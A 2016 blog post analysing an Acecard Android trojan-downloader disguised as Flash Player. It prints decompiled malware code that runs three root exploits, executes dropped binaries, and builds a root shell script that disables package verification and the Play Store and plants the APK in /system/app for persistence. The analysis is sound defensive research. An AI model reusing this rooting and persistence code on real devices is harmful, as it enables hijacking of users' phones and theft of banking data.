Monday, February 29, 2016

Acercard Mobile Trojan: its root exploits and its debugging messages

A few days ago Kaspersky wrote in its blog about the evolution of a bank trojan for Android named Acerard (https://blog.kaspersky.com/acecard-android-trojan/11368/


 



As per Kasperky new it seems that some version of this Trojan has been found in Google Play store: 

"But this is not the only way this malware is distributed. On 28 December 2015, Kaspersky Lab experts were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play store. The Trojan propagates under the guise of a game. When the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen and no actual sign of the installed application."

The version Kaspersky mentioned is: Downloader.AndroidOS.Acecard.b

However, while doing some research, I found another version with name Downloader.AndroidOS.Acecard.c. .  VirusBulletin already talked about it:

 "We discovered a new version of trojan downloader: Trojan-Downloader.AndroidOS.Acecard.c. It is distinguished by the use of a vulnerability in the system after launching the trojan that allows it to obtain superuser permissions. Once equipped with these authorizations, Trojan-Downloader.AndroidOS.Acecard.c can install Acecard banking trojan in the system memory, which protects against the suppression via traditional tools. In addition, another trojan which we already know is spread the same way: it is Trojan-Ransom.AndroidOS.Pletor"


So let's take a look to this specimen.

Dynamic analysis 

The APK, once installed, looks like a valid Adobe Flash Application.




Looking at the debugging logs and the proxy, first thing I see is an HTTP connection to a host http://brutalmobiletube.com. In the HTTP request the IMEI of the device is sent, plus other information.
¨. 





Looking  deeper in the debugger, I find several interesting strings, but one of them bring my attention: Executing exploit...oh wait! is this real?!?! 






In the file system, there is a configuration file with something really funny: a very self-descriptive variable ROOTING_TRYED






Static analysis 

The code is really 'awesome', and the authors did not really care at all about being a bit 'stealthy' :)

First, here is a class name "LinuxExploitThread" which is quite self-descriptive.





The method "run" in that "LinuxExplotThread" class invokes several other methods which tries to to get root access in the device through different exploits. 


public void run()
  {
    try
    {
      boolean bool = this.semaphore.tryAcquire();
      if (!bool)
        return;
      SharedPreferences localSharedPreferences = this.context.getSharedPreferences("app_settings", 0);
      if (!localSharedPreferences.getBoolean("INSTALL_SENT", false))
        Utils.reportInstall(this.context);
      if (Status.haveRoot())
      {
        installPersistent();
        return;
      }
      if (Root.checkFramarootExploitability(this.context))
        runFramalinuxExploit();
      if (Status.haveRoot())
      {
        installPersistent();
        return;
      }
      if (Root.checkSELinuxExploitability(this.context))
        runSelinuxExploit();
      if (Status.haveRoot())
      {
        installPersistent();
        return;
      }
      if (Root.checkTowelExploitability(this.context))
        runTowelExploit();
      if (Status.haveRoot())
        installPersistent();
      while (true)
      {
        return;
        Utils.putBooleanValue(this.context, "ROOTING_TRYED", true, localSharedPreferences);
        MainService.reconfigure(this.context);
      }
    }
    finally
    {
      this.semaphore.release();
    }
  }



Beside that the malware author did not bother to obfuscate the code or even put names to the classes a bit less self-descriptive, the name of the methods to run the exploits are exactly the same than the vulnerability they try to exploit.


The three exploit methods, runFramaLinuxExploit() runSelinuxExploit() and runTowelExploit() are:



The exploits files are part of the APK file and are stored in a directory name "assets". 



Those files are renamed and used by the different exploits

private void runTowelExploit()
  {
    String str1 = this.context.getFilesDir().getAbsolutePath();
    if ((new AutoFile(str1, "vs").exists()) && (checkSelinuxExecution(str1 + "/" + "vs")))
    {
      Log.d("selinuxExploitThread", " (runTowelExploit) localexploit was already running");
      return;
    }
    try
    {
      Utils.dumpAsset(this.context, "ob.data", "vs");
      Utils.dumpAsset(this.context, "jb.data", "qj");
      Utils.dumpAsset(this.context, "sb.data", "ss");
      String str2 = String.format("%s/%s %s/%s %s/%s", new Object[] { str1, "vs", str1, "qj", str1, "ss" });
      Execute.execute("/system/bin/chmod 755 " + str2);
      Log.d("selinuxExploitThread", " (runTowelExploit), executing exploit");
      int i = Execute.executeSimple(str2).exitCode;
      Log.d("selinuxExploitThread", " (runTowelExploit), execution result: " + i);
      checkSelinuxExecution(str1 + "/" + "vs");
      return;
    }
    catch (Exception localException)
    {
      Log.d("selinuxExploitThread", " (runTowelExploit): Exception : " + localException.getMessage());
      return;
    }
    finally
    {
      new File(str1, "vs").delete();
      new File(str1, "qj").delete();
      new File(str1, "ss").delete();
    }
  }



Once the system is rooted, it is able to perform the installation of other APKs and remain persistent


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
private boolean installPersistent()
  {
    boolean bool2 = false;
    String str1 = Utils.getApkName(this.context);
    boolean bool1 = bool2;
    if (str1 != null)
    {
      if ((!Utils.isPersistent(this.context)) && (!Utils.persistencyReady()))
        break label36;
      bool1 = true;
    }
    while (true)
    {
      return bool1;
      try
      {
        label36: String str2 = Status.getBestShellAvailable();
        Execute.execute(new String[] { str2, "blw" });
        String str3 = this.context.getPackageName();
        Execute.executeScript(str2, new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf("export LD_LIBRARY_PATH=/vendor/lib:/system/lib\n")).append("settings put global package_verifier_enable 0\n").toString())).append("pm disable com.android.vending\n").toString())).append("sleep 1\n").toString())).append(String.format(new StringBuilder("cat %s > ").append("/system/app/MediaCommon_driver.apk").toString(), new Object[] { str1 })).append("\n").toString())).append("chmod 644 ").append("/system/app/MediaCommon_driver.apk").append("\n").toString())).append(String.format("[ -s %s ] && pm install -r -f ", new Object[] { "/system/app/MediaCommon_driver.apk" })).append("/system/app/MediaCommon_driver.apk").append("\n").toString())).append("sleep 1\n").toString())).append("installed=$(pm list packages ").append(str3).append(")\n").toString())).append("if [ ${#installed} -gt 0 ]; then\n").toString())).append("am startservice ").append(str3).append("/.MainService").append("\n").toString())).append("am broadcast -a android.intent.action.USER_PRESENT\n").toString())).append("fi\n").toString())).append("sleep 2\n").toString())).append("pm enable com.android.vending\n").toString() + str2 + " blr" + "\n", this.context);
        Utils.sleep(1000);
        bool1 = bool2;
        if (Execute.executeRoot("ls -l " + "/system/app/MediaCommon_driver.apk").getStdout().contains("/system/app/MediaCommon_driver.apk"))
        {
          Utils.reboot();
          return false;
        }
      }
      catch (Exception localException)
      {
      }
    }
    return false;
  }